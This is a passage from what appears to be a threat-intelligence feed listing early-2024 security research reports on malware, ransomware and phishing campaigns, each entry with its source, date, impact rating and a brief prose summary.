https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
—
- Intel Source:
- RexorVc0
- Intel Name:
- Diving_Deep_into_Pony_Malware
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Pony, also called Fareit or Siplog, is a malware that is classified as a loader and stealer but may also be used as a botnet because it has been around for over a decade and is still in use. This notorious malware is still available for purchase, is still receiving upgrades, and has been used to launch other malware during attacks on victim infrastructures in addition to stealing confidential data.
—
- Intel Source:
- Securonix
- Intel Name:
- New_SUBTLE_PAWS_PowerShell_Backdoor_Drops_on_Ukraine
- Date of Scan:
- 2024-02-02
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have identified an ongoing campaign (tracked as STEADY#URSA) that is likely tied to Shuckworm and targets military personnel in Ukraine. Perhaps via phishing emails, compressed files are used to transmit the harmful payload. The study found that military jargon and references to Ukrainian cities were present in a large number of the samples. Given that the attack includes multiple TTPs that are only utilized by the organization and have been mentioned in previous campaigns against the Ukrainian military, it is most likely connected to Shuckworm.
—
- Intel Source:
- Cloudflare
- Intel Name:
- An_Incident_Occurred_During_Thanksgiving_2023
- Date of Scan:
- 2024-02-02
- Impact:
- LOW
- Summary:
- On November 23, 2023, Thanksgiving Day, Cloudflare discovered a threat actor on our Atlassian server that we host ourselves. Their security team shut down the threat actor’s access right away, launched an investigation, and on Sunday, November 26, they invited CrowdStrike’s Forensic team to do their own independent study.
Source:
https://blog.cloudflare.com/thanksgiving-2023-security-incident
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Establishing_Backdoor_Accounts_on_Linux
- Date of Scan:
- 2024-02-02
- Impact:
- LOW
- Summary:
- Attack campaigns that involve installing a backdoor account on unmanaged Linux SSH servers have been identified for a long time. Threat actors will have the option to either sell the credentials they have gathered from the compromised systems on the dark web or utilize the extra backdoor accounts to later install malware strains like ransomware, CoinMiners, and DDoS bots on the compromised system.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- A_recent_Nitrogen_malware_campaign
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Malwarebytes in their blog analyzed a recent Nitrogen campaign and how the initial payload is being served to victims. The threat actors prefer to host their payloads on compromised WordPress sites, many of which are already hacked with malicious PHP shell scripts.
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_large_scale_campaign_called_ApateWeb
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Unit 42 researchers discovered a large-scale campaign we call ApateWeb that uses a network of over 130,000 domains to deliver scareware, potentially unwanted programs (PUPs), and other scam pages. Among these PUPs, we have identified several adware programs including a rogue browser and different browser extensions.
Source:
https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Over_2000_PCs_in_Ukraine_Impacted_by_DIRTYMOE
- Date of Scan:
- 2024-02-01
- Impact:
- MEDIUM
- Summary:
- For over five years, DIRTYMOE has been recognized as a modular malware. provides technical tools for remote computer access, and it’s primarily (though not only) employed for mining and DDoS attacks. Typically, using widely used software that comes with an MSI installer causes the initial damage. A rootkit installed in the backdoor hinders the removal of operating system components from the file system and registry when the system is in normal mode.
—
- Intel Source:
- Synacktiv
- Intel Name:
- KRUSTYLOADER_RUST_malware_analysis
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- On 18th January, it was an observation of the new evidence of compromised Ivanti Connect Secure instances by Volexity who published their observations which include hashes of Rust payloads downloaded on compromised instances. Synacktiv shared in their article a malware analysis of these unidentified Rust payloads that was labeled as KrustyLoader.
—
- Intel Source:
- Stairwell
- Intel Name:
- A_new_variant_of_VileRAT_malware
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Last month, Stairwell’s research team observed a new variant of VileRAT that has been circulating since August 2023. After some public reports and detecting filenames. The analysis showed that this variant is being distributed through fake software piracy sites to broadly infect systems.
Source:
https://stairwell.com/resources/technical-analysis-the-silent-torrent-of-vilerat/
—
- Intel Source:
- Cado Security
- Intel Name:
- A_novel_cryptojacking_campaign_Commando_Cat
- Date of Scan:
- 2024-02-01
- Impact:
- LOW
- Summary:
- Cado researchers have recently observed a new malware campaign, called “Commando Cat”, which targeted exposed Docker API endpoints. This is the second time targeting Docker since 2024 started the first being the malicious deployment of the 9hits traffic exchange application.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Grandoreiro_banking_trojan_operation
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- ESET has provided technical analysis, statistical information, and known command and control (C&C) server domain names and IP addresses. Due to a design flaw in Grandoreiro’s network protocol, ESET researchers were also able to get a glimpse into the victimology.
—
- Intel Source:
- Proofpoint
- Intel Name:
- The_Return_of_TA576
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have discovered the reappearance of TA576, a cybercriminal threat actor that targets accounting and finance companies in particular with tax-themed baits. This actor mostly targets North American organizations with low-volume email campaigns, and is only active during the first few months of the year during tax season in the United States. In every campaign, the actor will try to distribute remote access trojans (RATs) and will respond to emails asking for help with tax preparation.
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Attack_Using_Stealth_And_Brute_Force
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- TrendMicro researchers have found that Pawn Storm remains unwavering in its pursuit to breach the networks and email accounts of high-profile targets worldwide. The group initially employed brute-force attacks from dedicated servers and later integrated more anonymization layers like commercial VPN services and Tor.
Source:
https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html
—
- Intel Source:
- CSIRT-CTI
- Intel Name:
- China_linked_hackers_target_Myanmar_s_top_ministries
- Date of Scan:
- 2024-01-31
- Impact:
- MEDIUM
- Summary:
- Mustang Panda, the China-based threat actor has targeted Myanmar’s Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.
Source:
https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/
—
- Intel Source:
- Cluster25
- Intel Name:
- The_Russian_Opposition_Faces_New_Campaign
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Researchers from Cluster25 have discovered a recently launched campaign that is probably connected to a Russian APT organization. The spear-phishing mails used in this effort went after organizations that supported Russian dissident movements and were publicly critical of the Russian government, both inside and outside the country.
Source:
https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition
—
- Intel Source:
- Mandiant
- Intel Name:
- The_Hidden_Depths_of_USB_Malware
- Date of Scan:
- 2024-01-31
- Impact:
- LOW
- Summary:
- Mandiant researchers have discovered a distinct evolution in the TTPs from the campaign’s early stages, commencing with the use of the explorer.ps1 payload featuring a custom decoding scheme. This progressed to the adoption of asymmetric encryption, accompanied by the incorporation of device tracking capabilities.
Source:
https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware
—
- Intel Source:
- Netenrich
- Intel Name:
- A_Deep_Dive_into_Alpha_Ransomware
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Netenrich group researchers provided updates for Alpha ransomware, a completely different group then ALPHV ransomware, which has recently emerged with the launch of its Dedicated/Data Leak Site on the Dark Web and an initial listing of six victims’ data.
Source:
https://netenrich.com/blog/alpha-ransomware-a-deep-dive-into-its-operations
—
- Intel Source:
- Red Canary
- Intel Name:
- MSIX_installers_deliver_malware_payloads
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Starting in July 2023, Red Canary began investigating a series of attacks by adversaries leveraging MSIX files to deliver malware. The adversaries in each intrusion appeared to be using malicious advertising or SEO poisoning to draw in victims, who believed that they were downloading legitimate software such as Grammarly, Microsoft Teams, Notion, and Zoom.
—
- Intel Source:
- Fortinet
- Intel Name:
- Albabat_Ransomware_roundup
- Date of Scan:
- 2024-01-30
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts researched data for a ransomware variant that triggered their attention called Albabat. Albabat, also known as White Bat, is a money-motivated ransomware variant written in Rust that finds and encrypts files important to the user and demands a ransom to release them. It first appeared last November, 2023. The affected platforms are Microsoft Windows and impacted parties are Microsoft Windows Users.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-albabat
—
- Intel Source:
- AT&T and PaloAlto
- Intel Name:
- Microsoft_Teams_Delivers_DarkGate_Malware
- Date of Scan:
- 2024-01-30
- Impact:
- MEDIUM
- Summary:
- Although the majority of end users are probably aware of the risks associated with traditional phishing attacks, such those that arrive by email or other media, many are probably not aware that Microsoft Teams chats could also be a potential source of phishing attacks. While most Teams activity takes place within an organization, Microsoft by default permits users to add persons from outside the organization to their Teams chats. This function has, somewhat unsurprisingly, given bad actors a new way to take advantage of unsuspecting or inexperienced consumers.
—
- Intel Source:
- ASEC
- Intel Name:
- Attacker_of_Trigona_Ransomware_Using_Mimic_Ransomware
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- ASEC researchers discovered a new way that the threat actor behind the Trigona ransomware is installing Mimic ransomware. Similar to previous instances, the newly discovered attack focuses on MS-SQL servers and is noteworthy for exploiting the MS-SQL servers’ Bulk Copy Program (BCP) feature to install malware.
—
- Intel Source:
- Cybereason
- Intel Name:
- Examining_DarkGate_Loader_in_Depth
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Researchers at Cybereason have looked at occurrences involving the modular loader known as DarkGate Loader, which is sent via phishing emails and is in charge of delivering payloads that are used after an attack. Threat actors use the AutoIt script DarkGate Loader to deliver an encrypted payload. The payload is decrypted and injected into various processes by the AutoIt script. In the end, using DarkGate Loader triggers the use of post-exploitation tools like Meterpreter and Cobalt Strike.
Source:
https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- Zloader_Returned_With_New_Iteration
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered that Zloader has comeback with an updated version, signaling a potential increase in ransomware attacks. The latest iteration of Zloader includes significant enhancements to its loader module, incorporating RSA encryption, an improved Domain Generation Algorithm (DGA), and advanced obfuscation techniques. Additionally, the malware now employs more junk code, API import hashing, and string encryption, making it more resilient against malware analysis.
Source:
https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night
—
- Intel Source:
- Inquest
- Intel Name:
- The_malicious_URL_file_uses
- Date of Scan:
- 2024-01-30
- Impact:
- LOW
- Summary:
- Inquest shared their details about the exploration of URL files, and their resurgence in the threat space as various vulnerabilities and exposures have led to adversaries finding utility in this simple file type.
Source:
https://inquest.net/blog/shortcut-to-malice-url-files/
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Additional_Phobos_Ransomware_Variant_Initiates_an_Attack
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs have discovered an Office document that includes a VBA script meant to spread the FAUST ransomware, which is a different kind of Phobos. The attackers stored many Base64-encoded files, each containing a malicious binary, using the Gitea service. These files start a file encryption attack when they are inserted into the memory of a system.
Source:
https://www.fortinet.com/blog/threat-research/phobos-ransomware-variant-launches-attack-faust
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Attackers_Exploiting_Publicly_Exposed_RDP_Host
- Date of Scan:
- 2024-01-29
- Impact:
- MEDIUM
- Summary:
- Researchers for The DFIR report saw threat actors in late December 2022 taking advantage of a publicly accessible Remote Desktop Protocol server, which resulted in the exfiltration of data and the installation of the Trigona ransomware. The threat actors spread ransomware throughout the network on Christmas Eve, just three hours after they first gained access.
Source:
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/
—
- Intel Source:
- Blackberry
- Intel Name:
- Persistent_Cyber_Threats_Targeting_Mexican_Entities
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- The BlackBerry Threat Research and Intelligence team have found that cyber attackers are consistently targeting Mexican organizations for financial gains. They use legitimate Mexican government resources, such as the IDSE software update document and the IMSS payment system SIPARE.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Batch_File_Holding_Several_Payloads
- Date of Scan:
- 2024-01-29
- Impact:
- LOW
- Summary:
- Although most people consider Windows batch files (.bat) to be extremely basic, they can actually be fairly complicated or include intriguing encoded payloads. One that a Powershell process was using and had several decoded payloads was discovered by researchers. The trick to adding comments to these kinds of files is in the magic. “REM” is the default (or most popular) keyword to use.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Russian_APT_Operation_Star_Blizzard
- Date of Scan:
- 2024-01-29
- Impact:
- MEDIUM
- Summary:
- Star Blizzard’s strategies operate in the ever-evolving cyber threat arena with a measured precision that is akin to a strategic orchestration. In this case, spear-phishing mimics a method that has been meticulously thought out and carried out. This elusive group, with an advanced level of intelligence akin to that of seasoned professionals, methodically pinpoints individual and group members as their intended audience.
Source:
https://socradar.io/russian-apt-operation-star-blizzard/
—
- Intel Source:
- Cyble
- Intel Name:
- An_ongoing_phishing_campaign_spreads_with_an_Atomic_Stealer_version
- Date of Scan:
- 2024-01-26
- Impact:
- MEDIUM
- Summary:
- Cyble researchers discovered a new version of AMOS Stealer going thru website and pretending like legit Mac applications, including Parallels Desktop, CleanMyMac, Arc Browser, and Pixelmator. Earlier this year, the AMOS stealer has been circulating via Google Ads, serving as the main distribution method.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_BianLian_ransomware_group
- Date of Scan:
- 2024-01-25
- Impact:
- MEDIUM
- Summary:
- The article discusses the detection and prevention of the BianLian encryptor and backdoor by Cortex XDR, as well as the use of SmartScore and protections offered by Palo Alto Networks. It also provides a list of IP addresses associated with the BianLian ransomware gang and additional resources for further information. The article also explores a potential connection between the BianLian and Makop ransomware groups and provides a technical analysis of the attack lifecycle of the BianLian group. It includes screenshots of alerts and prevention measures taken by Cortex XDR. The article also lists various codes and IP addresses related to the threat assessment of the malware.
Source:
https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- New_China_Aligned_APT_Group_Called_Blackwood_Using_NSPX30_implants
- Date of Scan:
- 2024-01-25
- Impact:
- MEDIUM
- Summary:
- Researchers from ESET have presented a study of an attack carried out by Blackwood, a previously unidentified threat actor that they believe has been active since at least 2018. Blackwood is associated with China. Using adversary-in-the-middle (AitM) attacks, the attackers distribute a sophisticated implant they have termed NSPX30. They do this by taking advantage of update requests that are made by legal software.
—
- Intel Source:
- Sonatype
- Intel Name:
- Malware_Drops_From_Fake_NPM_Package
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have discovered two npm packages, distube-config and discordyt, that mimic open source products such as Discord modules in an effort to infect Windows users with a Trojan.
Source:
https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware
—
- Intel Source:
- Arcticwolf
- Intel Name:
- Mimicking_CherryTree_to_Deploy_PrawEsc_Exploits
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- According to Arctic Wolf researchers, the loader poses as the authentic CherryTree note-taking program through its name and symbol, tricking potential victims into installing it. They have found evidence of this new attack tool in two recent incidents.
—
- Intel Source:
- ITOCHU Cyber & Intelligence Inc.
- Intel Name:
- The_Evolution_of_LODEINFO_Fileless_Malware
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- ITOCHU Cyber & Intelligence Inc. researchers have discovered an updated variant of the LODEINFO backdoor, which is disseminated through spear-phishing attacks. Both new features and modifications to the anti-analysis (analysis avoidance) strategies have been added to the malware.
Source:
https://blog-en.itochuci.co.jp/entry/2024/01/24/134100
—
- Intel Source:
- Shadowstackre
- Intel Name:
- Cactus_Ransomware_continued_activity
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- On January 20th, the Cactus ransomware group targeted again a large number of victims across different industries. The attacks were revealed with the victim’s data on their leak site. The ransomware group constantly puts a lot of pressure on victims by revealing their personal information about employees of the victim organization; this has included driver’s licenses, passports, pictures, and other personal identification.
—
- Intel Source:
- Security Affairs
- Intel Name:
- An_Italian_Adaptive_Phishing_Campaign_called_MY_SLICE
- Date of Scan:
- 2024-01-25
- Impact:
- LOW
- Summary:
- A highly targeted phishing attempt last year targeted email account holders of Italian organizations under the alias “My slice,” which was formed from the name of a variable in the landing page’s javascript code.
Source:
https://securityaffairs.com/157914/cyber-crime/my-slice-aitalian-adaptive-phishing-campaign.html
—
- Intel Source:
- ASEC
- Intel Name:
- Kasseika_Ransomware_Exploiting_LNK_Vulnerabilities
- Date of Scan:
- 2024-01-24
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center exposes a stealthy attack leveraging a malicious Word document disguised as an .lnk shortcut file. The attack, featuring the notorious AsyncRAT (VenomRAT), uses PowerShell commands and external URLs to download and execute payloads. The malware disguises itself as a Korean company’s certificate, making detection challenging.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Parrot_TDS_malware_campaign
- Date of Scan:
- 2024-01-24
- Impact:
- MEDIUM
- Summary:
- The article provides an overview of the Parrot TDS malware campaign, which has been active for over four years and continues to evolve with new techniques and obfuscations. The campaign targets victims globally and uses automatic tools to exploit known vulnerabilities, with the majority of compromised servers using WordPress, Joomla, or other content management systems. The article includes a list of codes and identifiers related to the campaign, as well as examples of the landing and payload scripts used. It also discusses the protections and mitigations offered by Palo Alto Networks and provides indicators of compromise for detecting and defending against malware.
Source:
https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/
—
- Intel Source:
- Infoblox
- Intel Name:
- Massive_Criminal_Affiliate_Program_by_Vextrio
- Date of Scan:
- 2024-01-24
- Impact:
- LOW
- Summary:
- Researchers from Infoblox expose a complex web of affiliations within the cybercrime ecosystem, focusing on prominent actors like VexTrio, ClearFake, and SocGholish. Collaboratively researched with security expert Randy McEoin, the study reveals these entities’ involvement in malicious activities, particularly in operating traffic distribution systems (TDS). VexTrio, a major player, is identified as the most pervasive threat in customer networks, acting as a traffic broker for over 60 affiliates. The research sheds light on their unique TDS model, attack chains involving multiple actors, and their exploitation of referral programs. The findings emphasize the critical role of TDS enterprises in the vast cybercrime economy and advocate for increased industry collaboration to counter these threats effectively.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Kasseika_Using_BYOVD_Attacks
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- TrendMicro researchers have examined the Kasseika ransomware and the indications they discovered imply that the perpetrators had obtained the source code of the infamous BlackMatter ransomware.
—
- Intel Source:
- Project Discovery, ISC.SANS, Picus Security
- Intel Name:
- Update_on_Atlassian_Exploit_Activity_of_critical_vulnerabilty_CVE_2023_22527
- Date of Scan:
- 2024-01-23
- Impact:
- HIGH
- Summary:
- Exploit activity against Atlassian Confluence servers has exploded last couple days. The combination of a simple-to-exploit vulnerability and a potential set of high-value targets makes this an ideal vulnerability for many attackers. On January 16, 2024, Atlassian shared a disclosure about a remote code execution vulnerability affecting the Confluence Data Center and Confluence Server. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10. This critical vulnerability poses a significant risk to organizations.
Source:
https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
https://isc.sans.edu/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576
https://isc.sans.edu/diary/0
https://www.picussecurity.com/resource/blog/cve-2023-22527-another-ognl-injection-leads-to-rce-in-atlassian-confluence
—
- Intel Source:
- ASEC
- Intel Name:
- New_Legitimate_Program_Unveiled_In_DLL_Side_Loading_Attack
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- AhnLab Security Intelligence Center (ASEC) reveals the Lazarus Group’s latest cyber threat tactic involving a new legitimate program, “wmiapsrv.exe,” discovered on January 12, 2024. This program, utilized in DLL side-loading attacks (T1574.002), loads modified malicious DLLs, such as “wbemcomn.dll” and “netutils.dll,” serving as backdoors. The verification routine in wbemcomn.dll involves unique system information, making this an Advanced Persistent Threat (APT) attack aimed at specific systems.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Attackers_Using_GitHub_to_Store_Stolen_Data
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Two malicious packages on the npm open source package manager have been found by Revealing Labs researchers. These packages use GitHub to store stolen Base64-encrypted SSH keys that were taken from developer workstations that installed them.
Source:
https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Cybersecurity_Professionals
- Date of Scan:
- 2024-01-23
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have noticed a campaign by ScarCruft, a possible APT outfit based in North Korea, that targets prominent figures with knowledge of North Korean affairs as well as media outlets. ScarCruft is experimenting with new infection chains, one such trial was using a technical threat research paper as a ruse, presumably aimed at threat information users such as cybersecurity experts.
—
- Intel Source:
- Fortinet
- Intel Name:
- PyPI_Packages_That_Steal_Information
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Researchers from FortiGate have discovered a PyPI malware creator (known only by the ID “WS”) who subtly uploads malicious packages to PyPI. According to their current estimates, there could be more than 2000 “WS” victims from the shipments listed below alone.
Source:
https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi
—
- Intel Source:
- Cyble
- Intel Name:
- MetaStealer_Malware_Targeting_US_Asylum_Seekers
- Date of Scan:
- 2024-01-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered a ZIP archive file that may be downloaded from a URL and might be shared via spam emails. There is a shortcut LNK file hidden as a PDF document inside the ZIP package. The VPN application launches when the shortcut file is executed, and it uses DLL sideloading to load a hidden malicious DLL. The DLL and the VPN program are both hidden within a ZIP file.
Source:
https://cyble.com/blog/threat-actors-target-us-asylum-seekers-with-metastealer-malware/
—
- Intel Source:
- Trellix
- Intel Name:
- Kuiper_Ransomware_s_advanced_capabilities
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Trellix researchers shared their analysis about the threat actor’s sales post of the ransomware for Windows, Linux, and MacOS targeting binaries, and a version comparison. The version comparison is included in the technical analysis. The analyzed files, their hashes, and the detection information are listed at the end of this blog.
Source:
https://www.trellix.com/about/newsroom/stories/research/the-evolution-of-the-kuiper-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- SmokeLoader_Distribution_Aims_at_Ukrainian_Government_and_Businesses
- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have found that the Ukrainian government and businesses are receiving many infections of the SmokeLoader virus. Attacks on Ukraine appear to have grown in frequency recently. The Ukrainian Department of Justice, government agencies, insurance providers, healthcare providers, building businesses, and manufacturing companies are among the targets that have been confirmed thus far.
—
- Intel Source:
- Morphisec
- Intel Name:
- Update_to_the_Chaes_malware
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Morphisec Threat Labs has provided an analysis of Chae$ 4.1, an update to the Chaes Infostealer malware.
Source:
https://www.morphisec.com/hubfs/Chae$_Chronicles_Chaes4.1.pdf
https://blog.morphisec.com/chaes-chronicles
—
- Intel Source:
- Stairwal
- Intel Name:
- The_Trust_in_Digitally_Signed_Certificates_Is_Not_Always_Secure
- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- According to Stairwell threat experts, “Hainan YouHu Technology Co. Ltd.” is in charge of sending Microsoft the LaiXi file so that it can be signed. This app is made for social media content marketing and bulk administration of mobile devices. This program may be downloaded for Windows and Android from dl.cnhack[.]com. Interestingly, the infected sample that is examined came from a LaiXi_setup.exe file.
—
- Intel Source:
- Securelist
- Intel Name:
- Backdoor_in_macOS_Steals_Cryptowallets
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers at Securelist have discovered a new type of macOS malware that was previously unidentified and using software that has been cracked. The danger turned out to be much more serious than installing a proxy server without authorization.
Source:
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
—
- Intel Source:
- Cado Security
- Intel Name:
- Using_9Hits_Maliciously_on_Susceptible_Docker_Hosts
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers at Cado Security have noticed a new campaign that targets weak Docker services. The campaign installs the 9hits viewer application and a standard XMRig miner in two containers on the vulnerable instance. This is the first instance of malware using the 9hits application as a payload that has been reported.
Source:
https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/
—
- Intel Source:
- Greynoise
- Intel Name:
- Cryptomine_Exploit_Connect
- Date of Scan:
- 2024-01-22
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent exploit of Ivanti Connect Secure, a remote access software, to install cryptominers on affected systems. It includes details on the files, file paths, IP addresses involved in the exploit, and recommendations for organizations to block the listed IPs. The article also provides a decoded URL and shell script used in the attack and advice for detecting and preventing similar attacks. The author shares their experience of discovering the exploit and provides a script that exploits Ivanti Connect Secure to install cryptominers. The article also discusses creating a plan for a task, including checking for sudo privileges and creating a system service for the miner. It also includes a configuration file for the miner and information on the pool it connects to.
Source:
https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attack_With_UAC_0050_Using_RemoteUtilities
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have uncovered evidence of a widespread dissemination of emails purporting to be from the State Emergency Service of Ukraine and the State Special Communications Service. The emails contained links to Bitbucket or a RAR archive and were ostensibly about “evacuations” and “virus removal.”
—
- Intel Source:
- Trellix
- Intel Name:
- Using_Discord_Bot_for_advanced_info_stealer
- Date of Scan:
- 2024-01-22
- Impact:
- LOW
- Summary:
- The article discusses a Java-based malware that is being spread through cracked software zip files. The malware uses a Discord bot channel as an EventListener to steal sensitive information from the victim’s system. The delivery mechanism and threat analysis of the malware are discussed, along with its capabilities of stealing various data from browsers and applications. The article also includes indicators of compromise and recommendations for protection against such threats.
—
- Intel Source:
- Checkmarx
- Intel Name:
- A_malicious_Python_package_analysis
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Checkmarx researchers did a deep analysis of a malicious Python package. Targeting the open-source space in the software industry is going on among threat actors, not only because it represents one of the largest attack surfaces, but because it often escapes the vigilant eyes of organizations.
Source:
https://checkmarx.com/blog/when-the-hunter-becomes-the-hunted/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_malicious_Python_script_attacks_macOS_apps
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Xavier Mertens, an ISC SANS researcher found a malicious Python script targeting wallet applications on macOS. It targets two applications: Exodus3 and Bitcoin Core. It searches for occurrences of these applications.
—
- Intel Source:
- Jamf
- Intel Name:
- New_malware_embedded_in_pirated_macOS_applications
- Date of Scan:
- 2024-01-20
- Impact:
- LOW
- Summary:
- Recently, Jamf Threat Labs researchers in their blog, analyzed malware they observed in pirated macOS applications. It seemed like these apps were similar to ZuRu malware, download and execute multiple payloads to compromise machines in the background.
Source:
https://www.jamf.com/blog/jtl-malware-pirated-applications/
—
- Intel Source:
- Google Blog
- Intel Name:
- A_Russian_Threat_Group_Using_Malware_to_Target_Western_Officials
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers from the Google Analysis Group have examined a number of persistent threats, such as COLDRIVER (also referred to as UNC4057, Star Blizzard, and Callisto), a Russian threat group that specializes in credential phishing attacks against prominent figures in NGOs, former military and intelligence officers, and NATO governments.
Source:
https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/
—
- Intel Source:
- Splunk
- Intel Name:
- An_analysis_of_the_DarkGate_AutoIt_Loader
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- The Splunk Threat researchers provided a deep analysis of DarkGate malware and its use of AutoIt in their blog.
—
- Intel Source:
- Huntress
- Intel Name:
- The_use_of_TeamViewer_by_ransomware_deployment
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- Huntress security analysts recently warned their customers about two disparate endpoints identified as low impacted by ransomware. An investigation into each endpoint illustrated that initial access to each endpoint was achieved via TeamViewer.
Source:
https://www.huntress.com/blog/ransomware-deployment-attempts-via-teamviewer
—
- Intel Source:
- Rapid7
- Intel Name:
- A_new_stealer_named_Atlantida
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- This month, Rapid7 noticed a new stealer called Atlantida. The stealer makes users download a malicious file from a compromised website and uses different techniques such as reflective loading and injection before the stealer is loaded. Atlantida has a lot of different capabilities from stealing login information of software like Telegram, and Steam, several offline cryptocurrency wallet data, browser stored data as well as cryptocurrency wallet browser extension data. It also captures the victim’s screen and collects hardware data.
—
- Intel Source:
- Trustwave
- Intel Name:
- Stealthy_Godzilla_Webshell_Exploits_ActiveMQ_Vulnerability
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Trustwave have seen an increase in attacks that take advantage of holes in Apache ActiveMQ hosts. Sometimes, sites host malicious web shells called Java Server Pages (JSP). The web shells are made to elude security and signature-based scanners by being hidden inside an unidentified binary format. Interestingly, the web shell is still compiled and run by ActiveMQ’s JSP engine even if the binary’s file format is unknown.
—
- Intel Source:
- Volexity, CISA
- Intel Name:
- New_Observations_of_Ivanti_Connect_Secure_VPN_Exploitation
- Date of Scan:
- 2024-01-19
- Impact:
- MEDIUM
- Summary:
